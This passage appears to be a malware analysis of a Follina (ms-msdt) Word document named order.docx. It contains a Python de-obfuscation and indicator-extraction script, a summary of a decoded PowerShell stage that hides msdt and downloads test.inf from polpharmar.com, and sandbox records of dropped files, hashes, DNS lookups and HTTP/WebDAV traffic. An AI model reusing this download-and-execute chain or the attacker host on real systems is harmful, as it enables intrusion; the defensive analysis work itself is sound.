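    """Replace [char]N / [char]0xNN casts with the character they produce and
    drop the '+...+' single-quote joins so the command reads as one string."""
    def to_char(m: re.Match) -> str:
        tok = m.group(1)
        return "'" + chr(int(tok, 16 if tok.lower().startswith("0x") else 10)) + "'"
    ps = re.sub(r"\[char\](0x[0-9a-f]+|\d+)", to_char, ps, flags=re.IGNORECASE)
    return ps.replace("'+'", "")


B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}")


def decode_lenient_b64(blob: str) -> tuple[str, bool]:
    """Decode base64 that may be cut off mid-quantum, as the preview's blob is."""
    rem = len(blob) % 4
    if rem == 1:
        blob = blob[:-1]  # a lone trailing character encodes no complete byte
    elif rem:
        blob += "=" * (4 - rem)
    return base64.b64decode(blob).decode("utf-8", "replace"), rem != 0


def extract_iocs(jscript: str) -> dict:
    """De-obfuscate the staged ms-msdt payload and pull out its indicators."""
    href, cut = fold_js_strings(jscript)
    href = fold_powershell_chars(href)
    blob = B64_RUN.search(href)
    stage2, b64_cut = decode_lenient_b64(blob.group(0)) if blob else ("", False)
    return {
        "scheme": href.split(":", 1)[0],            # "ms-msdt" is the Follina tell
        "msdt_args": href.split('"', 1)[0].strip(),  # everything before the -param quote
        "stage2": stage2,                           # decoded PowerShell second stage
        "urls": re.findall(r"""https?://[^\s"']+""", stage2),
        "drop_paths": re.findall(r"""\$env:\w+\\[^\s"']+""", stage2),
        "truncated": cut or b64_cut,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_JSCRIPT).items():
        print(f"{key}: {value}")
```

Running it prints the de-obfuscated URL, `ms-msdt:/ID PcwdiAgnOSTiC -sKiP forCe -pArAm ...`, and the decoded second stage, which first force-stops `msdt` (hiding the troubleshooter window), then P/Invokes `urlmon!URLDownloadToFile` via `Add-Type` to fetch http://polpharmar.com/test.inf into `$env:APPDATA\test.inf`. The blob ends at `STart` because the report's preview is cut off there, so whatever launches the downloaded .inf is not recoverable from this page; the `truncated` flag reports that.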
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):1.9630438652210782
            Encrypted:false
            SSDEEP:12:rl3bn+HFADYWtaoa5sQ2p0hCXhlSRmCRncKvjMKvqrCJo0nKvqFn7i1X4CIX4X4h:rbR6Op0rRjRcSgSTSWio4VR
            MD5:D164864528BA69AE924554E4638BA1A6
            SHA1:7257FD1CC0A67FCEBAB6E078533460C45AAF3BBA
            SHA-256:36072BAE47AEB89D82C4E9AEAC305591853FB3B5FB5F328B41429E1AD583743E
            SHA-512:A204231FB6CAC172B2B3CBBAA2D27245B150300D601E948A4A556A560C6FBC2B00295EED81CA8F443285ABFDA149BD780FDA65E80B4DD6EAB2F82D8B38740728
            Malicious:false
            Reputation:low
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:dBase III DBT, version number 0, next free block index 5177357
            Category:dropped
            Size (bytes):2888
            Entropy (8bit):2.4712779761264723
            Encrypted:false
            SSDEEP:24:yFChNWhYG5laEUSsSkS90J+RTskGsAwMKinefAtHDlMsGf2KvBS4OxM:yEXWhh7CSsSkF7kPn/inOA7PJIg4O2
            MD5:FE62A27FE716EDD8CA556BD4BD4936B3
            SHA1:F16D68DCF3F5B66BC8632362A5582EC266403AA6
            SHA-256:50EF0BFE8FAD94DF14E78769F0DD6259B960DB21348B6BBD5B5A66D94B8968DE
            SHA-512:55BA43A5A2811C5A421BCC154B4687D9D002B8F6D86357DB26C9725928F032B9742B52910F292FFFCDFC56FF9862497BF7BB26B19CE7613EC22BE6FFB298FFDA
            Malicious:false
            Preview:..O.O. .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................,.......>...p...............V...........................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025534580459190742
            Encrypted:false
            SSDEEP:6:I3DPc0hV42J9vxggLRCg/gEQtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpH/glvYg3J/
            MD5:019F974878CAE2B3FC1E26BD4B84F84D
            SHA1:24025E2DDB9FB1A00CC767A59E5965DC7FDAB99A
            SHA-256:543C4D8F2C76D81913B99D569286D61D0FB1538EE499019BB6B8A3C1564F35D2
            SHA-512:670AAA166C8D0E5EA133CB9E850291D0F263D4DC0A07961A300EE561D10C970181D558D61BD6D35A85CC2ED451B464A5FB4170F02F1CE6D09B8BB4EFA38D98C9
            Malicious:false
            Preview:......M.eFy...z.......E.....qi.S,...X.F...Fa.q.............................."b4rN..2+.66Z............h..G..vRq*.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02561327614152181
            Encrypted:false
            SSDEEP:6:I3DPcO7mRvxggLRtuGBTw2RXv//4tfnRujlw//+GtluJ/eRuj:I3DPNCQ40evYg3J/
            MD5:7C0D380D75B07C76F90A64BC0C0BB4C4
            SHA1:97263771B651F3607BA16EE1091E4E0470D0D0A1
            SHA-256:637759E0BB88213E39C092E9150B36626FD34A2D81D3C11301EDA229B0EB6C75
            SHA-512:355EC0BFB45F9D4D1E46A179A1FF2C46327EBA12B69109D331B8818A8CC65D0532FE2AC70120C7C430AB0C350E96A645504F292907A427E247EFD345388E4A84
            Malicious:false
            Preview:......M.eFy...z...S.!.F.L.O...S,...X.F...Fa.q............................:.....aK..\|`..Q........5..K.I.T.....i.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):62
            Entropy (8bit):4.385929384302707
            Encrypted:false
            SSDEEP:3:bDuMJlSmNrFomxWBGrFov:bCYN5yG5y
            MD5:6E65A4A82201A6E784741E067206F0FF
            SHA1:D87C02C96364F566BC9D1BD0731EEABCB675D396
            SHA-256:0DD74BE8D4947A9D214C3996F2B1DAA7489CAEF559D564888A14252FB6F62C9E
            SHA-512:85154A06C9B0B429EDD011B6D971135C08DBE1AC3873AF3E61992980EB8573338D704D89BDE19C9527822A435CFDFDEE151574794E8F3A9EC48C626BABDD05BD
            Malicious:false
            Preview:[folders]..Templates.LNK=0..order.LNK=0..[misc]..order.LNK=0..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Mon Aug 1 16:49:19 2022, length=327439, window=hide
            Category:dropped
            Size (bytes):992
            Entropy (8bit):4.5589914149078465
            Encrypted:false
            SSDEEP:12:8x94II0gXg/XAlCPCHaXMBzB/nPyX+WeNGY5i+VicvbcHfZpzNDtZ3YilMMEpxRN:8x9Ik/XT89dqwQZ3eQH5Dv3qIu7D
            MD5:52F509E11A66BB60D5E215CECE2B2DDA
            SHA1:2936E51CCCE4FA3D3B96AD0A73A3601D4E1448CF
            SHA-256:A0890DE7166F147DDC6289D55DA4E1C2E549CAF2BB94AF5EFC13C6E8BE0DAEAF
            SHA-512:2CE4423374F89F3EFC652AD8D0459F2E4511DD20010B85155DDF3190F5C63E8026F8ED50941590C99AB6B1CDFFFD7C0D071A08EE8108A8EF6293ADA7AE20F97F
            Malicious:false
            Preview:L..................F.... ....(h..3...(h..3...8~.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2......U*. .ORDER~1.DOC.B......hT..hT..*...r.....'...............o.r.d.e.r...d.o.c.x.......t...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\order.docx.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..... .....[....
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Little-endian UTF-16 Unicode text, with no line terminators
            Category:dropped
            Size (bytes):2
            Entropy (8bit):1.0
            Encrypted:false
            SSDEEP:3:Qn:Qn
            MD5:F3B25701FE362EC84616A93A45CE9998
            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
            Malicious:false
            Preview:..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:true
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            File type:Microsoft Word 2007+
            Entropy (8bit):7.996855978259955
            TrID:
            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
            • ZIP compressed archive (8000/1) 7.92%
            File name:order.docx
            File size:327439
            MD5:8abea2d6c14af54c6eac09d158554085
            SHA1:3802d9c8b3530fe7b140cbd4a12c3895c46077b2
            SHA256:aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
            SHA512:81bc9de694da797127ae09ac5a8e1d630981482e60343d870d6f106752af3bb2a9330852be728c2293a29c890f5d21b31ba820712a052fbc847d0fc06473050d
            SSDEEP:6144:khRfXb0GPobJUS8LOtB2x4FSTiSwQOV9Wojlv1CkMb02AxNw+w1m:khRfYGP+JUFOt9einQOKq/Mb0o1m
            TLSH:586423C4AAACFCC9E7DC2589E87343F871492954527C9B33E00274AC4DA7292EE77B10
            File Content Preview:PK.........g.T..'.d...T.......[Content_Types].xmlUT...S|.bS|.bS|.b...n.0.E......(1tQU..E.......=.n..m^..1..B)..l"%3....5..Z.l.>HkJ2(.$.........9.#Y.......l ....j8.8...M(.<FwOi.s.,....Je.f._}M.....z...RnM....<.h...[..=..s....${h...$.9%9.X.K#.(..P.r......6.
            Icon Hash:e4e6a2a2a4b4b4a4
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Aug 1, 2022 10:49:38.572686911 CEST  49171        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:38.621368885 CEST  80           49171      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:38.621476889 CEST  49171        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:38.621876955 CEST  49171        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:38.670455933 CEST  80           49171      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:38.674829960 CEST  80           49171      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:38.674990892 CEST  49171        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:43.679717064 CEST  80           49171      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:43.679815054 CEST  49171        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:44.537843943 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:44.586576939 CEST  80           49172      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:44.586747885 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:44.586869001 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:44.635643005 CEST  80           49172      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:44.636255026 CEST  80           49172      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:44.846836090 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:44.884654045 CEST  80           49172      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:44.884814978 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:49.640113115 CEST  80           49172      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:49.640312910 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:49.640367985 CEST  49172        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:49.689097881 CEST  80           49172      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:49.881912947 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:49.930389881 CEST  80           49173      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:49.930533886 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:49.930742979 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:49.978899002 CEST  80           49173      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:49.981864929 CEST  80           49173      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:50.182560921 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:50.230763912 CEST  80           49173      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:50.230948925 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:51.319211960 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:51.371577978 CEST  80           49173      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:51.571059942 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.743328094 CEST  49173        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.796791077 CEST  80           49173      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.844263077 CEST  49171        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.844916105 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.893034935 CEST  80           49171      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.893435955 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.893615007 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.900791883 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.949476957 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950392962 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950459957 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950469017 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950470924 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.950478077 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950488091 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950506926 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950517893 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.950521946 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950537920 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950544119 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.950552940 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950567007 CEST  80           49174      91.235.116.180  192.168.2.22
Aug 1, 2022 10:49:52.950567961 CEST  49174        80         192.168.2.22    91.235.116.180
Aug 1, 2022 10:49:52.950597048 CEST  49174        80         192.168.2.22    91.235.116.180
            Aug 1, 2022 10:49:52.950613976 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.954075098 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.990808010 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.274751902 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.324143887 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:53.329531908 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.569763899 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.619056940 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:53.619286060 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.343363047 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.391961098 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.392148018 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.392364979 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.440833092 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.441466093 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.644490957 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.690577030 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.690649033 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:55.436187983 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:55.487442970 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:55.689749002 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.788990974 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.839572906 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:56.855813026 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.904831886 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:56.905010939 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.926876068 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.976238966 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:56.976454020 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:57.047100067 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:57.166090012 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:57.215281963 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:57.215473890 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:59.447031021 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:59.447299957 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:59.448188066 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:59.496814013 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:50:01.844790936 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:50:01.844955921 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:50:01.844994068 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:50:01.893204927 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:50:02.219672918 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:50:02.219764948 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:51:03.713165045 CEST4917480192.168.2.2291.235.116.180
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Aug 1, 2022 10:49:38.539911985 CEST | 192.168.2.22 | 8.8.8.8 | 0xdd01 | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:44.487778902 CEST | 192.168.2.22 | 8.8.8.8 | 0x53f0 | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:44.509357929 CEST | 192.168.2.22 | 8.8.8.8 | 0x4117 | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:49.798683882 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:49.818392038 CEST | 192.168.2.22 | 8.8.8.8 | 0xbe50 | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:54.283454895 CEST | 192.168.2.22 | 8.8.8.8 | 0xb76d | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:54.323168039 CEST | 192.168.2.22 | 8.8.8.8 | 0x5851 | Standard query (0) | polpharmar.com | A (IP address) | IN (0x0001)
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Aug 1, 2022 10:49:38.559703112 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd01 | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:44.505176067 CEST | 8.8.8.8 | 192.168.2.22 | 0x53f0 | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:44.536066055 CEST | 8.8.8.8 | 192.168.2.22 | 0x4117 | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:49.816215992 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:49.880886078 CEST | 8.8.8.8 | 192.168.2.22 | 0xbe50 | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:54.311333895 CEST | 8.8.8.8 | 192.168.2.22 | 0xb76d | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            Aug 1, 2022 10:49:54.342415094 CEST | 8.8.8.8 | 192.168.2.22 | 0x5851 | No error (0) | polpharmar.com | | 91.235.116.180 | A (IP address) | IN (0x0001)
            • polpharmar.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            0 | 192.168.2.22 | 49171 | 91.235.116.180 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            Aug 1, 2022 10:49:38.621876955 CEST | 0 | OUT | OPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:38.674829960 CEST | 0 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:38 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: httpd/unix-directory


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            1 | 192.168.2.22 | 49172 | 91.235.116.180 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            Aug 1, 2022 10:49:44.586869001 CEST | 1 | OUT | HEAD /test.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Aug 1, 2022 10:49:44.636255026 CEST | 2 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:44 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:44.884654045 CEST | 2 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:44 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            2 | 192.168.2.22 | 49173 | 91.235.116.180 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            Aug 1, 2022 10:49:49.930742979 CEST | 3 | OUT | OPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: polpharmar.com
            Aug 1, 2022 10:49:49.981864929 CEST | 3 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:49 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: httpd/unix-directory
            Aug 1, 2022 10:49:50.230763912 CEST | 4 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:49 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: httpd/unix-directory
            Aug 1, 2022 10:49:51.319211960 CEST | 4 | OUT | PROPFIND / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            Depth: 0
            translate: f
            Content-Length: 0
            Host: polpharmar.com
            Aug 1, 2022 10:49:51.371577978 CEST | 4 | IN | HTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:51 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Aug 1, 2022 10:49:52.743328094 CEST | 5 | OUT | PROPFIND / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            Depth: 0
            translate: f
            Content-Length: 0
            Host: polpharmar.com
            Aug 1, 2022 10:49:52.796791077 CEST | 5 | IN | HTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:52 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=98
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
